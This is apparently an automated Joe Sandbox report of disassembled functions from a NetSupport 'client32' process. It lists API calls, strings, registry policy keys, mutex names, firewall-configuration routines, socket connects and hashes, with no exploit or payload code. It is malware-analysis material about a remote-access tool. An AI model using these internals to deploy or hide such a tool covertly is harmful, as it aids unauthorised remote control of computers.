Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
API String ID: 4263811268-2492245516
Opcode ID: b2c71a3f6ae315afdbd1fe6f65c001537057266dc0e2ac014cab0f1348a51108
Instruction ID: 07132911a412ef52ee848883b0d57285eedf3ad5575a4b9bafdb68f1b00dfaa6
Opcode Fuzzy Hash: b2c71a3f6ae315afdbd1fe6f65c001537057266dc0e2ac014cab0f1348a51108
Instruction Fuzzy Hash: 0871A075E0470AAFEB10CF79CC45BDAFBE4EB48304F10456AE96AD7280EB75A500CB91

Function 1102FE74 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 176synchronizationlibraryloaderCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 1102FFB3
CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1102FFCC
GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030049
SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103005F
WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103008E
CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103009B
FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 110300A6
CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 110300AD

Strings

istaUI, xrefs: 1102FECF
SOFTWARE\Policies\NetSupport\Client\standard, xrefs: 1102FEF0
PCIMutex, xrefs: 1102FFA4, 1102FFC3
_debug\tracefile, xrefs: 1102FF1B
/247, xrefs: 1102FFD8
_debug\trace, xrefs: 1102FF0A
SetProcessDPIAware, xrefs: 11030043

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
API String ID: 2061479752-1320826866
Opcode ID: a8b48be93bf1ef46857f665a52cf2e4b3454d492b3d5c5dd6b81d03fb91c553e
Instruction ID: 28233a226cad534e48a3842a4e0c7e682da8a74b242a0ded550d6c50420a17f8
Opcode Fuzzy Hash: a8b48be93bf1ef46857f665a52cf2e4b3454d492b3d5c5dd6b81d03fb91c553e
Instruction Fuzzy Hash: 76511C74E013169FDB11DBA1CC88F9EF7B49F44709F1041E8E919A7285EF746A40CB62

Function 11131370 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 101windowCOMMON

Download Yara Rule

APIs

Part of subcall function 111417E0: _memset.LIBCMT ref: 11141825
Part of subcall function 111417E0: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114183E
Part of subcall function 111417E0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141865
Part of subcall function 111417E0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141877
Part of subcall function 111417E0: FreeLibrary.KERNEL32(00000000), ref: 1114188F
Part of subcall function 111417E0: GetSystemDefaultLangID.KERNEL32 ref: 1114189A

AdjustWindowRectEx.USER32(1113DB48,00CE0000,00000001,00000001), ref: 111313B7
LoadMenuA.USER32(00000000,000003EC), ref: 111313C8
GetSystemMetrics.USER32(00000021), ref: 111313D9
GetSystemMetrics.USER32(0000000F), ref: 111313E1
GetSystemMetrics.USER32(00000004), ref: 111313E7
GetDC.USER32(00000000), ref: 111313F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 111313FE
ReleaseDC.USER32(00000000,00000000), ref: 1113140A
CreateWindowExA.USER32(00000001,NSMWClass,023CDF88,00CE0000,80000000,80000000,1113DB48,?,00000000,?,11000000,00000000), ref: 1113145F
GetLastError.KERNEL32(?,?,?,?,?,110F5809,00000001,1113DB48,_debug), ref: 11131467

Strings

Fs, xrefs: 111313FE
mainwnd ht1=%d, ht2=%d, yppi=%d, xrefs: 1113141E
NSMWClass, xrefs: 11131459
CreateMainWnd, hwnd=%x, e=%d, xrefs: 1113146F

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
String ID: Fs$CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
API String ID: 1594747848-4184434473
Opcode ID: 7281dd7751e614175c8dce41f6d5c7d8aafef09e31021395c24f009c96aa77ba
Instruction ID: 9cc38207800c48755d7f962ceed396d8e742c52f1043c8e55726c054ea069f44
Opcode Fuzzy Hash: 7281dd7751e614175c8dce41f6d5c7d8aafef09e31021395c24f009c96aa77ba
Instruction Fuzzy Hash: 6C31A072E00319AFDB109FE58C84BBFFBB8EB48719F104528FA11B7284D67069408BA5

Function 1102C000 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C3D0: SetEvent.KERNEL32(00000000,?,1102C03F), ref: 1110C3F4

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C045
GetTickCount.KERNEL32 ref: 1102C06A

Part of subcall function 110CE2D0: __strdup.LIBCMT ref: 110CE2EA

GetTickCount.KERNEL32 ref: 1102C164

Part of subcall function 110CEF30: wvsprintfA.USER32(?,?,1102C101), ref: 110CEF5B

Part of subcall function 110CE380: _free.LIBCMT ref: 110CE3AD

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C25C
CloseHandle.KERNEL32(?), ref: 1102C278

Strings

GetLatLong=%s, took %d ms, xrefs: 1102C181
LatLong, xrefs: 1102C028, 1102C115
IsA(), xrefs: 1102C2AE, 1102C2C2, 1102C2D6, 1102C2EA
http://geo.netsupportsoftware.com/location/loca.asp, xrefs: 1102C085
?IP=%s, xrefs: 1102C0F6
GeoIP, xrefs: 1102C0B3
_debug, xrefs: 1102C0B8, 1102C11A
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102C2A9, 1102C2BD, 1102C2D1, 1102C2E5

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
API String ID: 596640303-1725438197
Opcode ID: dda23666e9ae4ffbc9faa980174efbfe645a1e8455c3d9b406f788bef0b5428c
Instruction ID: 92710dfa5788f637d48b64b720a6e5bc5ec8e20d3bb6cc7594a6b260f570a90e
Opcode Fuzzy Hash: dda23666e9ae4ffbc9faa980174efbfe645a1e8455c3d9b406f788bef0b5428c
Instruction Fuzzy Hash: 5E81A374E0060A9FDB04DBE4CD80FEEF7B5AF45708F508659E92567281DB34BA09CB61

Function 11060D40 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 11060D9A

Part of subcall function 11060780: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 110607BC
Part of subcall function 11060780: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060814

RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060DEB
RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060EA5
RegCloseKey.ADVAPI32(?), ref: 11060EC1

Strings

Client, xrefs: 11060E3A
Software\Policies\NetSupport\Client\Standard, xrefs: 11060DAD
Software\Policies\NetSupport\Client, xrefs: 11060D94
Standard, xrefs: 11060E06
%s\%s\%s\, xrefs: 11060E44
Client, xrefs: 11060DA8, 11060ED8
Client.%04d.%s, xrefs: 11060E27
Software\Policies\NetSupport, xrefs: 11060E3F
DisableUserPolicies, xrefs: 11060ED3

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Enum$Open$CloseValue
String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
API String ID: 2823542970-1528906934
Opcode ID: dd11b5a8640d03804c1d49c9822c36202c3d07f7c97d6e5b7f1e1e4bc8854663
Instruction ID: d080a53fd8ea07f48dbdc4252f8689ef8bdd9062327065f776ba7b054214a859
Opcode Fuzzy Hash: dd11b5a8640d03804c1d49c9822c36202c3d07f7c97d6e5b7f1e1e4bc8854663
Instruction Fuzzy Hash: 8E4171B4E4022DABD721CB118C81FEEF7BCEB44708F5041D9F659A6140DAB06E85CFA5

Function 11134C30 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON

Download Yara Rule

APIs

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

GetTickCount.KERNEL32 ref: 11134C92

Part of subcall function 11095A00: CoInitialize.OLE32(00000000), ref: 11095A14
Part of subcall function 11095A00: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134C9B), ref: 11095A2E
Part of subcall function 11095A00: CoCreateInstance.OLE32(?,00000000,00000001,111BBF6C,?,?,?,?,?,?,?,11134C9B), ref: 11095A4B
Part of subcall function 11095A00: CoUninitialize.OLE32(?,?,?,?,?,?,11134C9B), ref: 11095A69

GetTickCount.KERNEL32 ref: 11134CA1
_memset.LIBCMT ref: 11134CE3
GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11134CF9
_strrchr.LIBCMT ref: 11134D08
_free.LIBCMT ref: 11134D5A

Strings

*AutoICFConfig, xrefs: 11134C67
IsICFPresent() took %d ms, xrefs: 11134CAD
Client, xrefs: 11134C6C
No ICF present, xrefs: 11134D92
ICFConfig2 returned 0x%x, xrefs: 11134D60
IsICFPresent..., xrefs: 11134C7F
ICFConfig, xrefs: 11134C45

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
API String ID: 711243594-1270230032
Opcode ID: ef466dfda7726091f789933c0b3d214dbbefffcad99d397d42e5d2dc58734e76
Instruction ID: d44bafd8d9da45843e77f34f686076cbab1fa436d88e3f7880232d47d14e06df
Opcode Fuzzy Hash: ef466dfda7726091f789933c0b3d214dbbefffcad99d397d42e5d2dc58734e76
Instruction Fuzzy Hash: 7F41AC79E002299BD720CBB59C81BEEF768AF6431CF00417AED0597184EA716D44CFA5

Function 6C3C7610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32 ref: 6C3C7642
connect.WSOCK32(00000000,?,?), ref: 6C3C7659
WSAGetLastError.WSOCK32(00000000,?,?), ref: 6C3C7660
_memmove.LIBCMT ref: 6C3C76D3
select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C3C76F3
GetTickCount.KERNEL32 ref: 6C3C7717
ioctlsocket.WSOCK32 ref: 6C3C775C
SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C3C7762
WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6C3C777A
__WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6C3C778B

Strings

*BlockingIO, xrefs: 6C3C7732
ConnectTimeout, xrefs: 6C3C767E
General, xrefs: 6C3C7683

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
String ID: *BlockingIO$ConnectTimeout$General
API String ID: 4218156244-2969206566
Opcode ID: 2c4011d38012cf43e009d3ac203f1c25ce43c11c85c4a9e7984c8f504d47f66b
Instruction ID: b8740f605ffe66d2d434b8644917e31edef5ca60f57cb538d398d6654d241e57
Opcode Fuzzy Hash: 2c4011d38012cf43e009d3ac203f1c25ce43c11c85c4a9e7984c8f504d47f66b
Instruction Fuzzy Hash: D041F171B003189BE720DB64CC4CBEE73B9AF49308F00459AD94997642EB719E58DFA3

Function 1112FD90 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 107COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1112FE00
GetTickCount.KERNEL32 ref: 1112FE31
SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112FE44
GetTickCount.KERNEL32 ref: 1112FE4C

Strings

%s%s, xrefs: 1112FDFA, 1112FE9E
.#v, xrefs: 1112FED5, 1112FDCF
HasStudentComponents=%d, xrefs: 1112FEC7
Software\NSL, xrefs: 1112FE74
runplugin.exe, xrefs: 1112FDDE
Warning. SHGetFolderPath took %d ms, xrefs: 1112FE56
schplayer.exe, xrefs: 1112FE88
CommonPath, xrefs: 1112FE6F

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$FolderPathwsprintf
String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe$.#v
API String ID: 1170620360-2953616677
Opcode ID: b288d4b57d0d0b2d34e3eb9ebe913360750b8a7c9b2bac9cda8c32c6bc0feb13
Instruction ID: f4f6a2bea37850ad8127b8e165224775ed1d93873bf7b98c8719b5195f3bfc69
Opcode Fuzzy Hash: b288d4b57d0d0b2d34e3eb9ebe913360750b8a7c9b2bac9cda8c32c6bc0feb13
Instruction Fuzzy Hash: AD316B76F0132A6BEB119BE19C80BEEF7689F5470DF200066FD15AB185EA34B5008763

Function 110303A1 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 315COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 110303A5
GetStockObject.GDI32(0000000D), ref: 110305B2
GetObjectA.GDI32(00000000,0000003C,?), ref: 110305C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11030600
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11030606
InterlockedExchange.KERNEL32(023C8D48,00001388), ref: 11030686
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110306B8

Strings

pcicl32, xrefs: 11030791
.%d, xrefs: 110306C2
Error %s unloading audiocap dll, xrefs: 110308CF

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
String ID: .%d$Error %s unloading audiocap dll$pcicl32
API String ID: 1428277488-3899566344
Opcode ID: 66f951e236329f90cc6c7154276e79d5748412b98c58dffe2df336eb6851ac34
Instruction ID: 84648f9d665478c15cc5e3a9dbad83d71a07a2a0da0358c26eb6467f7add28d3
Opcode Fuzzy Hash: 66f951e236329f90cc6c7154276e79d5748412b98c58dffe2df336eb6851ac34
Instruction Fuzzy Hash: 7DC16DB0D06365DFDB02CBF4CC847AEBAB46B8430DF1401EAD849B7289E7715A84CB52

Function 1102C800 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102D7F8,00000000,33E68B52,?,00000000,00000000), ref: 1102CA34
OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CA4A
QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CA5E
CloseServiceHandle.ADVAPI32(00000000), ref: 1102CA65
Sleep.KERNEL32(00000032), ref: 1102CA76
CloseServiceHandle.ADVAPI32(00000000), ref: 1102CA86
Sleep.KERNEL32(000003E8), ref: 1102CAD2
CloseHandle.KERNEL32(?), ref: 1102CAFF

Strings

NSM.LIC, xrefs: 1102CB37
NSA.LIC, xrefs: 1102CB46, 1102CB4D, 1102CB7D
ProtectedStorage, xrefs: 1102CA44
>, xrefs: 1102C9AB

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

